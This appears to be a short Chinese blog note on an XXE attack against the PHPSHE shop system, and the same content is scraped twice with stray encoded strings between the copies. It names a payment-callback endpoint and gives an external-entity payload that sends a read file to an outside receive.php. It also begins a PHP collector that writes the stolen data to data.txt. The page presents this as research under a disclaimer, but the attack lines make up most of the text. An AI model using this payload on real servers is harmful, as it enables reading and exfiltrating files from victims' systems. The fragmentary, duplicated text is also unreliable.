【笔记】PHPSHE的XXE外部实体攻击
前言
PHPSHE的XXE外部实体攻击
正文
1 | GET http://example.com/include/plugin/payment/wechat/notify_url.php |
1 | <!ENTITY % remote_send "<!ENTITY send SYSTEM 'http://example.com/receive.php?data=%file;'>"> |
data.txt:写入到文件
1 | $data = $_GET['data']; |
57uv6Z6g55qE5Y2a5a6i
MS4wLjABAAAA5qMD8Gzdcgq7HXUOviKB59i0-ybJ59jJvNzyaPt5XOsVNqP6DU7WLcoAXvdxvYdp💗
本站所有文章仅作技术研究,请勿非法破坏,请遵守相关法律法规,后果自负
PHPSHE的XXE外部实体攻击
1 | GET http://example.com/include/plugin/payment/wechat/notify_url.php |
1 | <!ENTITY % remote_send "<!ENTITY send SYSTEM 'http://example.com/receive.php?data=%file;'>"> |
data.txt:写入到文件
1 | $data = $_GET['data']; |